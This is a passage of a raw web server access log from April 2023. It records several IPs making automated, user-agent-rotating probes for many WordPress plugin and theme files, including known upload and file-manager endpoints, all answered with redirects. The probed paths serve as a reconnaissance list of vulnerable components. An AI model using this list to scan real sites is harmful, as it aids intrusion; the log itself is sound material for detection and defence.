Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:18 +0700] "GET /wp-content/plugins/armember-membership/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:20 +0700] "GET /wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:23 +0700] "GET /wp-content/plugins/wp-user-avatar/changelog.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:25 +0700] "GET /wp-content/plugins/sitemap-by-click5/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:28 +0700] "GET /wp-content/plugins/nd-restaurant-reservations/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:32 +0700] "GET /wp-content/plugins/nd-donations/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:33 +0700] "GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:37 +0700] "GET /wp-content/plugins/nd-shortcodes/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:39 +0700] "GET /wp-content/plugins/nd-learning/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:41 +0700] "GET /wp-content/plugins/wpcargo/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:43 +0700] "GET /wp-content/plugins/woo-product-table/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:43 +0700] "GET /wp-content/plugins/woo-product-table/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:45 +0700] "GET /wp-content/plugins/tatsu/changelog.md HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:47 +0700] "GET /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:48 +0700] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:50 +0700] "GET /wp-content/plugins/vc-tabs/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:52 +0700] "GET /wp-content/plugins/shortcode-addons/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:55 +0700] "GET /wp-content/plugins/dzs-zoomsounds/admin/admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:56 +0700] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:00 +0700] "GET /wp-content/plugins/superlogoshowcase-wp/css/sls-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:02 +0700] "GET /wp-content/plugins/super-interactive-maps/css/sim-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:06 +0700] "GET /wp-content/plugins/superstorefinder-wp/css/ssf-wp-admin.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:08 +0700] "GET /wp-content/plugins/e-signature/page-template/default/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:12 +0700] "GET /wp-content/plugins/angwp/__%20UPDATES.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:13 +0700] "GET /wp-content/plugins/ait-csv-import-export/changelog.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:15 +0700] "GET /wp-content/plugins/image-hover-effects-ultimate/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:26:20 +0700] "GET /wp-content/plugins/ulisting/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:23 +0700] "GET /wp-content/plugins/wp-pinterest-automatic/changelog HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:25 +0700] "GET /wp-content/plugins/capabilities-pro/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:26:27 +0700] "GET /wp-content/plugins/capability-manager-enhanced/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:26:28 +0700] "GET /wp-content/plugins/wp-automatic/css/wp-automatic.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:30 +0700] "GET /wp-content/plugins/wp-automatic/changelog HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:31 +0700] "GET /wp-content/plugins/wp-user-extra-fields/js/wpuef-configurator.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:26:34 +0700] "GET /wp-content/plugins/woocommerce-upload-files/js/wcuf-admin-menu.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 35.217.124.200 - - [06/Apr/2023:19:10:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 147.78.47.249 - - [06/Apr/2023:21:16:36 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Apr/2023:21:16:39 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Apr/2023:21:16:40 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Apr/2023:21:16:43 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:12 +0700] "GET /wp-content/plugins/zendrop-dropshipping-and-fulfillment/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:14 +0700] "GET /complete-order/?selected_package=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:22 +0700] "GET /wp-content/plugins/n-media-woocommerce-checkout-fields/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:58:24 +0700] "GET /wp-content/plugins/videowhisper-live-streaming-integration/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:26 +0700] "GET /wp-content/plugins/js-support-ticket/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:28 +0700] "GET /wp-content/themes/statfort-new/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:58:31 +0700] "GET /wp-content/themes/faith-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:34 +0700] "GET /wp-content/themes/soccer-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:36 +0700] "GET /wp-content/themes/churchlife/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:40 +0700] "GET /wp-content/themes/onelife/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:42 +0700] "GET /wp-content/themes/snapture/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:44 +0700] "GET /wp-content/themes/theme-deejay/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:46 +0700] "GET /wp-content/themes/bolster-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:49 +0700] "GET /wp-content/themes/rocky-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:51 +0700] "GET /wp-content/themes/bolster/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:55 +0700] "GET /wp-content/themes/soundblast/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:57 +0700] "GET /wp-content/themes/spikes-black/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:58:59 +0700] "GET /wp-content/themes/spikes/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:02 +0700] "GET /wp-content/themes/kingclub-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:06 +0700] "GET /wp-content/themes/club-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:09 +0700] "GET /wp-content/themes/statfort/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:12 +0700] "GET /wp-content/themes/aidreform/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:59:14 +0700] "GET /wp-content/themes/footysquare/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:17 +0700] "GET /wp-content/themes/westand/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:20 +0700] "GET /wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:23 +0700] "GET /wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:59:26 +0700] "GET /wp-content/plugins/membership-for-woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:27 +0700] "GET /wp-content/plugins/membership-for-woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:30 +0700] "GET /wp-content/plugins/wp-upg/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:34 +0700] "GET /wp-content/plugins/booking-calendar/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:59:39 +0700] "GET /wp-content/plugins/woo-refund-and-exchange-lite/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:41 +0700] "GET /wp-content/plugins/armember/js/arm_widgets_js.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:45 +0700] "GET /wp-content/plugins/armember/documentation/index.html HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:49 +0700] "GET /wp-content/plugins/jobboardwp/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:59:53 +0700] "GET /wp-content/themes/listingo/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:11:59:55 +0700] "GET /wp-content/themes/listingo/js/listingo_callbacks.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:11:59:58 +0700] "GET /wp-content/themes/greyd_suite/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:01 +0700] "GET /wp-content/plugins/alphabetic-pagination/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:06 +0700] "GET /wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:08 +0700] "GET /wp-content/themes/workreap/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:12 +0700] "GET /wp-content/plugins/wpgateway/css/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:14 +0700] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:17 +0700] "GET /wp-content/plugins/ninja-forms/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:21 +0700] "GET /wp-content/plugins/armember-membership/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:23 +0700] "GET /wp-content/plugins/wp-live-chat-support-pro/css/wplc_styles_pro.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:26 +0700] "GET /wp-content/plugins/wp-user-avatar/changelog.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:30 +0700] "GET /wp-content/plugins/sitemap-by-click5/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:35 +0700] "GET /wp-content/plugins/nd-restaurant-reservations/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:40 +0700] "GET /wp-content/plugins/nd-donations/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 128.140.12.242 - - [07/Apr/2023:12:00:43 +0700] "GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:47 +0700] "GET /wp-content/plugins/nd-shortcodes/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:51 +0700] "GET /wp-content/plugins/nd-learning/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:54 +0700] "GET /wp-content/plugins/wpcargo/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:00:58 +0700] "GET /wp-content/plugins/woo-product-table/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:01 +0700] "GET /wp-content/plugins/tatsu/changelog.md HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 128.140.12.242 - - [07/Apr/2023:12:01:04 +0700] "GET /wp-content/plugins/masterstudy-lms-learning-management-system/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) 